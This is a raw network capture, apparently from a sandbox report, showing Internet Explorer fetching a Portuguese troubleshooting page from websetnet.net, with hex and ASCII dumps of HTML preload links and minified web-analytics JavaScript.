                                                                                              2021-12-13 23:57:38 UTC8869INData Raw: 6c 79 28 76 6f 69 64 20 30 2c 66 29 3b 62 2e 70 75 73 68 28 66 29 3b 64 2e 70 75 73 68 28 67 29 3b 72 65 74 75 72 6e 20 66 7d 7d 66 75 6e 63 74 69 6f 6e 20 74 62 28 61 29 7b 72 65 74 75 72 6e 21 61 7d 66 75 6e 63 74 69 6f 6e 20 68 62 28 61 2c 63 29 7b 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 4c 28 61 29 7b 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 78 62 28 61 29 7b 69 66 28 4c 65 29 72 65 74 75 72 6e 20 4c 65 3b 76 61 72 20 63 3d 21 31 3b 74 72 79 7b 63 3d 5b 5d 2e 69 6e 64 65 78 4f 66 26 26 30 3d 3d 3d 5b 76 6f 69 64 20 30 5d 2e 69 6e 64 65 78 4f 66 28 76 6f 69 64 20 30 29 7d 63 61 74 63 68 28 64 29 7b 7d 76 61 72 20 62 3d 61 2e 41 72 72 61 79 26 26 61 2e 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 26 26 73 61 28 61 2e 41 72 72
                                                                                              Data Ascii: ly(void 0,f);b.push(f);d.push(g);return f}}function tb(a){return!a}function hb(a,c){return c}function L(a){return a}function xb(a){if(Le)return Le;var c=!1;try{c=[].indexOf&&0===[void 0].indexOf(void 0)}catch(d){}var b=a.Array&&a.Array.prototype&&sa(a.Arr
                                                                                              2021-12-13 23:57:38 UTC8877INData Raw: 31 5d 3c 3c 63 5d 3a 5b 61 5b 31 5d 3c 3c 63 2d 33 32 2c 30 5d 7d 66 75 6e 63 74 69 6f 6e 20 5a 28 61 2c 63 29 7b 72 65 74 75 72 6e 5b 61 5b 30 5d 5e 63 5b 30 5d 2c 61 5b 31 5d 5e 63 5b 31 5d 5d 7d 66 75 6e 63 74 69 6f 6e 20 4b 68 28 61 29 7b 61 3d 5a 28 61 2c 5b 30 2c 61 5b 30 5d 3e 3e 3e 31 5d 29 3b 61 3d 53 61 28 61 2c 5b 34 32 38 33 35 34 33 35 31 31 2c 33 39 38 31 38 30 36 37 39 37 5d 29 3b 61 3d 5a 28 61 2c 5b 30 2c 61 5b 30 5d 3e 3e 3e 31 5d 29 3b 61 3d 53 61 28 61 2c 5b 33 33 30 31 38 38 32 33 36 36 2c 34 34 34 39 38 34 34 30 33 5d 29 3b 72 65 74 75 72 6e 20 61 3d 5a 28 61 2c 5b 30 2c 61 5b 30 5d 3e 3e 3e 31 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 56 6d 28 61 2c 63 29 7b 76 6f 69 64 20 30 3d 3d 3d 63 26 26 28 63 3d 32 31 30 29 3b 76 61 72 20 62 3d 61
                                                                                              Data Ascii: 1]<<c]:[a[1]<<c-32,0]}function Z(a,c){return[a[0]^c[0],a[1]^c[1]]}function Kh(a){a=Z(a,[0,a[0]>>>1]);a=Sa(a,[4283543511,3981806797]);a=Z(a,[0,a[0]>>>1]);a=Sa(a,[3301882366,444984403]);return a=Z(a,[0,a[0]>>>1])}function Vm(a,c){void 0===c&&(c=210);var b=a
                                                                                              2021-12-13 23:57:38 UTC8885INData Raw: 68 69 66 74 4b 65 79 3f 32 3a 30 29 7c 28 61 2e 63 74 72 6c 4b 65 79 3f 34 3a 30 29 7c 28 61 2e 61 6c 74 4b 65 79 3f 31 3a 30 29 7c 28 61 2e 6d 65 74 61 4b 65 79 3f 38 3a 30 29 7c 28 61 2e 63 74 72 6c 4b 65 79 7c 7c 61 2e 61 6c 74 4b 65 79 3f 31 36 3a 30 29 7d 66 75 6e 63 74 69 6f 6e 20 57 68 28 61 29 7b 76 61 72 20 63 3d 5b 5d 3b 56 65 7c 7c 28 56 65 3d 21 30 2c 55 65 26 26 63 2e 70 75 73 68 2e 61 70 70 6c 79 28 63 2c 24 6d 28 61 2e 6f 2c 75 61 28 61 2e 6f 29 29 29 2c 7a 62 28 61 2e 6f 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 56 65 3d 21 31 7d 2c 22 66 76 2e 63 22 29 29 3b 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 58 68 28 61 2c 63 2c 62 2c 64 29 7b 76 61 72 20 65 3d 65 62 28 63 29 3b 69 66 28 21 65 7c 7c 69 67 28 61 2c 65 29 29 72 65 74 75 72 6e
                                                                                              Data Ascii: hiftKey?2:0)|(a.ctrlKey?4:0)|(a.altKey?1:0)|(a.metaKey?8:0)|(a.ctrlKey||a.altKey?16:0)}function Wh(a){var c=[];Ve||(Ve=!0,Ue&&c.push.apply(c,$m(a.o,ua(a.o))),zb(a.o,function(){Ve=!1},"fv.c"));return c}function Xh(a,c,b,d){var e=eb(c);if(!e||ig(a,e))return
                                                                                              2021-12-13 23:57:38 UTC8893INData Raw: 2e 77 61 3d 0a 42 6f 6f 6c 65 61 6e 3b 79 61 2e 4d 61 3d 22 74 72 61 63 6b 4c 69 6e 6b 73 22 3b 79 61 2e 78 63 3d 22 65 6e 61 62 6c 65 41 6c 6c 22 3b 76 61 72 20 69 69 3d 4f 28 66 75 6e 63 74 69 6f 6e 28 61 2c 63 29 7b 76 61 72 20 62 3d 63 5b 30 5d 3b 61 5b 62 5d 3d 7b 46 62 3a 63 5b 31 5d 2c 50 63 3a 4c 62 5b 62 5d 7d 3b 72 65 74 75 72 6e 20 61 7d 2c 7b 7d 2c 50 61 28 79 61 29 29 2c 75 62 3d 7b 7d 2c 51 3d 72 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 69 64 2b 22 3a 22 2b 61 2e 4e 7d 29 2c 4e 68 3d 6e 61 28 22 31 22 29 2c 6a 61 3d 7a 68 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 22 22 3b 61 3d 4f 28 66 75 6e 63 74 69 6f 6e 28 62 2c 64 29 7b 76 61 72 20 65 3d 64 5b 30 5d 2c 66 3d 22 22 2b 65 2b 22 3a 22 2b 64 5b 31 5d
                                                                                              Data Ascii: .wa=Boolean;ya.Ma="trackLinks";ya.xc="enableAll";var ii=O(function(a,c){var b=c[0];a[b]={Fb:c[1],Pc:Lb[b]};return a},{},Pa(ya)),ub={},Q=r(function(a){return a.id+":"+a.N}),Nh=na("1"),ja=zh(function(a){var c="";a=O(function(b,d){var e=d[0],f=""+e+":"+d[1]
                                                                                              2021-12-13 23:57:39 UTC8901INData Raw: 79 6d 42 52 43 22 29 3b 63 7c 7c 69 68 28 61 2c 22 5f 79 6d 42 52 43 22 29 3b 72 65 74 75 72 6e 20 63 7d 29 2c 43 61 3d 72 28 66 68 29 2c 44 64 3d 72 28 66 68 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 63 2c 62 29 7b 72 65 74 75 72 6e 22 22 2b 63 2b 62 7d 29 2c 57 3d 72 28 51 67 29 2c 64 68 3d 4b 62 28 22 72 22 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 63 29 7b 76 61 72 20 62 3d 63 68 28 61 2c 63 29 2c 64 3d 62 5b 30 5d 3b 72 65 74 75 72 6e 21 62 5b 31 5d 26 26 64 7d 29 2c 64 64 3d 72 28 62 68 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 63 29 7b 72 65 74 75 72 6e 22 7b 22 2b 63 2e 24 61 2b 63 2e 67 61 7d 29 2c 77 65 3d 72 28 45 63 2c 51 29 2c 70 66 3d 71 28 64 64 2c 55 62 29 2c 53 6c 3d 62 61 28 66 75 6e 63 74 69 6f 6e 28 61 2c 63 29 7b 66 6f 72 28 76 61 72 20 62 3d 5b 5d 3b
                                                                                              Data Ascii: ymBRC");c||ih(a,"_ymBRC");return c}),Ca=r(fh),Dd=r(fh,function(a,c,b){return""+c+b}),W=r(Qg),dh=Kb("r",function(a,c){var b=ch(a,c),d=b[0];return!b[1]&&d}),dd=r(bh,function(a,c){return"{"+c.$a+c.ga}),we=r(Ec,Q),pf=q(dd,Ub),Sl=ba(function(a,c){for(var b=[];
                                                                                              2021-12-13 23:57:39 UTC8909INData Raw: 29 7b 76 61 72 20 63 3d 73 64 28 61 29 2e 62 28 22 6c 74 22 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 63 3f 61 2e 4d 61 74 68 2e 72 6f 75 6e 64 28 31 30 30 2a 63 29 3a 63 7d 3b 67 62 2e 63 6f 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 24 65 28 4d 28 61 29 2e 62 28 22 6a 6e 22 29 29 7d 3b 76 61 72 20 69 6f 3d 42 61 28 67 62 29 2c 6a 6f 3d 42 61 28 78 63 29 2c 45 6c 3d 69 6f 2e 63 6f 6e 63 61 74 28 6a 6f 29 2c 42 6c 3d 5b 22 52 54 43 50 65 65 72 43 6f 6e 6e 65 63 74 69 6f 6e 22 2c 22 6d 6f 7a 52 54 43 50 65 65 72 43 6f 6e 6e 65 63 74 69 6f 6e 22 2c 22 77 65 62 6b 69 74 52 54 43 50 65 65 72 43 6f 6e 6e 65 63 74 69 6f 6e 22 5d 2c 67 64 3d 72 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 72 61 3a 7b 7d 2c 0a 70 65 6e 64 69 6e 67 3a
                                                                                              Data Ascii: ){var c=sd(a).b("lt",null);return c?a.Math.round(100*c):c};gb.co=function(a){return $e(M(a).b("jn"))};var io=Ba(gb),jo=Ba(xc),El=io.concat(jo),Bl=["RTCPeerConnection","mozRTCPeerConnection","webkitRTCPeerConnection"],gd=r(function(){return{ra:{},pending:
                                                                                              2021-12-13 23:57:39 UTC8917INData Raw: 79 67 28 61 2c 66 29 3a 64 65 6c 65 74 65 20 67 5b 22 70 61 67 65 2d 72 65 66 22 5d 3b 67 5b 22 70 61 67 65 2d 75 72 6c 22 5d 3d 79 67 28 61 2c 68 29 2e 73 6c 69 63 65 28 30 2c 6c 61 2e 69 63 29 3b 72 65 74 75 72 6e 20 65 28 29 7d 7d 7d 29 3b 6d 61 5b 22 35 22 5d 3d 58 28 71 28 6e 62 28 5b 75 65 2c 41 63 5d 29 2c 74 62 29 2c 72 61 29 3b 76 61 72 20 47 64 2c 43 69 3d 47 28 49 2e 72 65 6a 65 63 74 2c 49 2c 69 62 28 29 29 2c 63 61 3d 28 47 64 3d 7b 7d 2c 47 64 2e 68 3d 44 61 2c 47 64 2e 65 72 3d 77 28 43 69 2c 4c 29 2c 47 64 29 3b 63 61 2e 61 3d 44 61 3b 63 61 5b 22 34 22 5d 3d 4d 67 3b 63 61 2e 66 3d 44 61 3b 63 61 2e 6e 3d 44 61 3b 63 61 5b 22 36 22 5d 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 63 2c 62 29 7b 76 61 72 20 64 3d 48 62 28 61 2c 63 29 3b 72 65 74 75
                                                                                              Data Ascii: yg(a,f):delete g["page-ref"];g["page-url"]=yg(a,h).slice(0,la.ic);return e()}}});ma["5"]=X(q(nb([ue,Ac]),tb),ra);var Gd,Ci=G(I.reject,I,ib()),ca=(Gd={},Gd.h=Da,Gd.er=w(Ci,L),Gd);ca.a=Da;ca["4"]=Mg;ca.f=Da;ca.n=Da;ca["6"]=function(a,c,b){var d=Hb(a,c);retu
                                                                                              2021-12-13 23:57:39 UTC8925INData Raw: 2c 47 6b 3d 22 74 68 65 6f 72 61 20 76 6f 72 62 69 73 20 31 20 61 76 63 31 2e 34 44 34 30 31 45 20 6d 70 34 61 2e 34 30 2e 32 20 76 70 38 2e 30 20 6d 70 34 61 2e 34 30 2e 35 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 46 6b 3d 22 70 72 65 66 65 72 73 2d 72 65 64 75 63 65 64 2d 6d 6f 74 69 6f 6e 3b 70 72 65 66 65 72 73 2d 72 65 64 75 63 65 64 2d 74 72 61 6e 73 70 61 72 65 6e 63 79 3b 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 20 64 61 72 6b 3b 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 20 6c 69 67 68 74 3b 70 6f 69 6e 74 65 72 3a 20 6e 6f 6e 65 3b 70 6f 69 6e 74 65 72 3a 20 63 6f 61 72 73 65 3b 70 6f 69 6e 74 65 72 3a 20 66 69 6e 65 3b 61 6e 79 2d 70 6f 69 6e 74 65 72 3a 20 6e 6f 6e 65 3b 61 6e 79 2d 70 6f 69 6e 74 65 72
                                                                                              Data Ascii: ,Gk="theora vorbis 1 avc1.4D401E mp4a.40.2 vp8.0 mp4a.40.5".split(" "),Fk="prefers-reduced-motion;prefers-reduced-transparency;prefers-color-scheme: dark;prefers-color-scheme: light;pointer: none;pointer: coarse;pointer: fine;any-pointer: none;any-pointer
                                                                                              2021-12-13 23:57:39 UTC8933INData Raw: 67 6f 61 6c 73 62 75 74 74 6f 6e 73 3d 31 22 29 29 69 61 28 61 29 2e 44 28 61 2c 5b 22 63 6c 69 63 6b 22 5d 2c 78 28 61 2c 22 63 2e 74 2e 63 22 2c 71 28 53 28 22 74 61 72 67 65 74 22 29 2c 44 28 5b 61 2c 63 5d 2c 7a 64 28 61 2c 63 2c 62 6b 29 29 29 29 29 2c 6c 62 28 61 2c 63 2c 22 42 75 74 74 6f 6e 20 67 6f 61 6c 2e 20 43 6f 75 6e 74 65 72 20 22 2b 0a 63 2e 69 64 2b 22 2e 20 49 6e 69 74 2e 22 29 28 29 7d 29 7d 29 2c 5a 66 2c 62 70 3d 7a 28 22 70 2e 61 69 22 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 63 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 49 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 28 76 63 28 61 29 7c 7c 6d 65 28 61 29 29 26 26 62 28 45 61 28 61 2c 63 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 28 64 3d 6e 28 64 2c 22 73 65 74 74
                                                                                              Data Ascii: goalsbuttons=1"))ia(a).D(a,["click"],x(a,"c.t.c",q(S("target"),D([a,c],zd(a,c,bk))))),lb(a,c,"Button goal. Counter "+c.id+". Init.")()})}),Zf,bp=z("p.ai",function(a,c){return new I(function(b){(vc(a)||me(a))&&b(Ea(a,c,function(d){var e;return(d=n(d,"sett
                                                                                              2021-12-13 23:57:39 UTC8941INData Raw: 63 29 28 7b 46 3a 6a 61 28 28 64 3d 7b 7d 2c 64 5b 65 5d 3d 31 2c 64 29 29 7d 2c 5b 62 5d 29 7d 29 2c 49 70 3d 4b 62 28 22 69 73 70 2e 73 74 61 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 63 2c 62 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 49 28 66 75 6e 63 74 69 6f 6e 28 64 2c 0a 65 29 7b 69 66 28 6d 6d 28 61 2c 6a 69 2c 22 69 73 70 22 29 29 7b 76 61 72 20 66 3d 66 75 6e 63 74 69 6f 6e 28 67 29 7b 28 22 31 22 3d 3d 3d 67 3f 64 3a 65 29 28 29 3b 4c 69 28 29 3b 67 3d 70 68 28 6a 69 29 3b 4b 28 22 69 73 70 22 2c 67 2e 68 61 29 26 26 28 67 2e 68 61 3d 58 28 71 28 6e 61 28 22 69 73 70 22 29 2c 74 62 29 2c 67 2e 68 61 29 2c 67 2e 68 61 2e 6c 65 6e 67 74 68 7c 7c 28 46 62 28 67 2e 66 61 29 2c 67 2e 66 61 3d 6e 75 6c 6c 29 29 7d 3b 4c 69 3d 69 61 28 61 29 2e 44 28 61
                                                                                              Data Ascii: c)({F:ja((d={},d[e]=1,d))},[b])}),Ip=Kb("isp.stat",function(a,c,b){return new I(function(d,e){if(mm(a,ji,"isp")){var f=function(g){("1"===g?d:e)();Li();g=ph(ji);K("isp",g.ha)&&(g.ha=X(q(na("isp"),tb),g.ha),g.ha.length||(Fb(g.fa),g.fa=null))};Li=ia(a).D(a


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              3192.168.2.349759104.26.9.138443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:31 UTC8088OUTGET /pt/fix-there-was-an-error-opening-this-document/?utm_source=google HTTP/1.1
                                                                                              Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Connection: Keep-Alive
                                                                                              Host: websetnet.net
                                                                                              2021-12-13 23:57:31 UTC8088INHTTP/1.1 200 OK
                                                                                              Date: Mon, 13 Dec 2021 23:57:31 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              CF-Ray: 6bd322a24829692d-FRA
                                                                                              Cache-Control: max-age=43200
                                                                                              Content-Language: pt
                                                                                              Last-Modified: Mon, 06 Dec 2021 15:39:32 GMT
                                                                                              Vary: Accept-Encoding
                                                                                              CF-Cache-Status: HIT
                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                              cf-apo-via: tcache
                                                                                              cf-edge-cache: cache,platform=wordpress
                                                                                              expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vYfiP4fpaxGLn3agCoSYTQA9XVkjERE7b4cet9RTProWHHUVeSz3IXHWbCY%2B58tSuIQ1Y%2F9HLoZDGOg5FJoEsrPGAoKhI3bVQiPWC4zPjn3Ref0Kmo%2Bl43sQsJ4VNmU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              x-gt-cache-status: HIT-TRANS
                                                                                              X-GT-OrigURL: /fix-there-was-an-error-opening-this-document/
                                                                                              x-gt-server: sis
                                                                                              X-Powered-By: PHP/7.4.25, PHP/7.4.25
                                                                                              Server: cloudflare
                                                                                              2021-12-13 23:57:31 UTC8089INData Raw: 33 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 64 65 66 65 72 6a 73 22 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f
                                                                                              Data Ascii: 39f<!DOCTYPE html><html lang="pt" class="no-deferjs"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><meta http-equiv="X-UA-Compatible" content="IE=edge"><link rel="dns-prefetch" href="https://fonts.go
                                                                                              2021-12-13 23:57:31 UTC8089INData Raw: 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 74 61 74 69 63 61 6c 6c 79 2e 69 6f 2f 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 74 61 74 69 63 61 6c 6c 79 2e 69 6f 2f 77 70 2f 63 2f 35 2e 38 2e 32 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 74 61 74 69 63 61 6c 6c 79 2e 69 6f 2f 77 70 2f 63 2f 35 2e 38 2e 32 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 6d 69 67 72 61 74 65 2e 6d 69
                                                                                              Data Ascii: ttps://cdn.statically.io/"><link rel="preload" as="script" href="https://cdn.statically.io/wp/c/5.8.2/wp-includes/js/jquery/jquery.min.js"><link rel="preload" as="script" href="https://cdn.statically.io/wp/c/5.8.2/wp-includes/js/jquery/jquery-migrate.mi
                                                                                              2021-12-13 23:57:31 UTC8090INData Raw: 36 65 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 74 61 74 69 63 61 6c 6c 79 2e 69 6f 2f 77 70 2f 63 2f 35 2e 38 2e 32 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 68 6f 76 65 72 49 6e 74 65 6e 74 2e 6d 69 6e 2e 6a 73 22 3e 0d 0a
                                                                                              Data Ascii: 6e<link rel="preload" as="script" href="https://cdn.statically.io/wp/c/5.8.2/wp-includes/js/hoverIntent.min.js">
                                                                                              2021-12-13 23:57:31 UTC8090INData Raw: 31 0d 0a 0a 0d 0a
                                                                                              Data Ascii: 1
                                                                                              2021-12-13 23:57:31 UTC8090INData Raw: 38 39 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 74 61 74 69 63 61 6c 6c 79 2e 69 6f 2f 6a 73 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 67 65 6e 65 73 69 73 2f 6c 69 62 2f 6a 73 2f 6d 65 6e 75 2f 73 75 70 65 72 66 69 73 68 2e 6d 69 6e 2e 6a 73 22 3e 0d 0a
                                                                                              Data Ascii: 89<link rel="preload" as="script" href="https://cdn.statically.io/js/websetnet.net/wp-content/themes/genesis/lib/js/menu/superfish.min.js">
                                                                                              2021-12-13 23:57:31 UTC8090INData Raw: 31 0d 0a 0a 0d 0a
                                                                                              Data Ascii: 1
                                                                                              2021-12-13 23:57:31 UTC8090INData Raw: 38 65 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 74 61 74 69 63 61 6c 6c 79 2e 69 6f 2f 6a 73 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 67 65 6e 65 73 69 73 2f 6c 69 62 2f 6a 73 2f 6d 65 6e 75 2f 73 75 70 65 72 66 69 73 68 2e 61 72 67 73 2e 6d 69 6e 2e 6a 73 22 3e 0d 0a
                                                                                              Data Ascii: 8e<link rel="preload" as="script" href="https://cdn.statically.io/js/websetnet.net/wp-content/themes/genesis/lib/js/menu/superfish.args.min.js">
                                                                                              2021-12-13 23:57:31 UTC8090INData Raw: 38 37 0d 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 74 61 74 69 63 61 6c 6c 79 2e 69 6f 2f 6a 73 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 67 65 6e 65 73 69 73 2f 6c 69 62 2f 6a 73 2f 73 6b 69 70 2d 6c 69 6e 6b 73 2e 6d 69 6e 2e 6a 73 22 3e 0a 0d 0a
                                                                                              Data Ascii: 87<link rel="preload" as="script" href="https://cdn.statically.io/js/websetnet.net/wp-content/themes/genesis/lib/js/skip-links.min.js">
                                                                                              2021-12-13 23:57:31 UTC8091INData Raw: 38 64 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 74 61 74 69 63 61 6c 6c 79 2e 69 6f 2f 6a 73 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6d 61 67 61 7a 69 6e 65 2d 70 72 6f 2f 6a 73 2f 72 65 73 70 6f 6e 73 69 76 65 2d 6d 65 6e 75 73 2e 6d 69 6e 2e 6a 73 22 3e 0a 0d 0a
                                                                                              Data Ascii: 8d<link rel="preload" as="script" href="https://cdn.statically.io/js/websetnet.net/wp-content/themes/magazine-pro/js/responsive-menus.min.js">
                                                                                              2021-12-13 23:57:31 UTC8091INData Raw: 31 30 63 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 74 61 74 69 63 61 6c 6c 79 2e 69 6f 2f 6a 73 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 73 61 73 73 79 2d 73 6f 63 69 61 6c 2d 73 68 61 72 65 2f 70 75 62 6c 69 63 2f 6a 73 2f 73 61 73 73 79 2d 73 6f 63 69 61 6c 2d 73 68 61 72 65 2d 70 75 62 6c 69 63 2e 6a 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 74 61 74 69 63 61 6c 6c 79 2e 69 6f 2f 67 68 2f 74 61 75 66 69 6b 2d 6e 75 72 72 6f 68 6d 61 6e 2f 66 33 68 2f 76 31
                                                                                              Data Ascii: 10c<link rel="preload" as="script" href="https://cdn.statically.io/js/websetnet.net/wp-content/plugins/sassy-social-share/public/js/sassy-social-share-public.js"><link rel="preload" as="script" href="https://cdn.statically.io/gh/taufik-nurrohman/f3h/v1
                                                                                              2021-12-13 23:57:31 UTC8091INData Raw: 31 0d 0a 0a 0d 0a
                                                                                              Data Ascii: 1
                                                                                              2021-12-13 23:57:31 UTC8091INData Raw: 61 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 74 61 74 69 63 61 6c 6c 79 2e 69 6f 2f 77 70 2f 70 2f 73 74 61 74 69 63 61 6c 6c 79 2f 31 2e 32 2e 31 2f 73 74 61 74 69 63 2f 70 61 67 65 62 6f 6f 73 74 65 72 2e 6a 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 22 3e 0d 0a
                                                                                              Data Ascii: aa<link rel="preload" as="script" href="https://cdn.statically.io/wp/p/statically/1.2.1/static/pagebooster.js"><link rel="preconnect" href="https://fonts.googleapis.com/">
